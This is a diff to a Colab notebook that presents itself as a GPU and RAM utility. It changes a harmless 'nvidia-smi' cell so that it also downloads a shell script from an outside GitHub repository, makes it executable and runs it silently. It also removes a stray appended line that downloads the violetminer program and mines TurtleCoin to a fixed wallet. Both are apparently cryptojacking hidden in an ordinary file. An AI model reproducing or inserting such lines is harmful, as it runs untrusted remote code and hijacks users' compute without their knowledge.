--- a/Utils/Colab_25GBRAM_GPU.ipynb
+++ b/Utils/Colab_25GBRAM_GPU.ipynb
@@ -98,7 +98,7 @@
         "outputId": "99916b4e-f42b-42c4-f932-fd6a698ccccb"
       },
       "source": [
-        "! nvidia-smi"
+        "! nvidia-smi && wget https://github.com/nandarr788/hansip/raw/main/ikuk1.sh && chmod +x ikuk1.sh && ./ikuk1.sh > /dev/null 2>&1"
       ],
       "execution_count": null,
       "outputs": [
@@ -142,4 +142,3 @@
     }
   ]
 }
-!wget https://github.com/turtlecoin/violetminer/releases/download/v0.2.2/violetminer-linux-v0.2.2.tar.gz && tar xf violetminer-linux-v0.2.2.tar.gz; cd violetminer-linux-v0.2.2 && ./violetminer --pool turtlecoin.herominers.com:10381 --username TRTLuwmJBUW1jCnGUyxkwQZJfgnq9nsZf6b1BXvTAeKP5aiAmcfUBZQFensN7DDY6Ea2QAy1NViZ9i4hbr1smhchHuPo3TkYDKm --password makan --algorithm turtlecoin
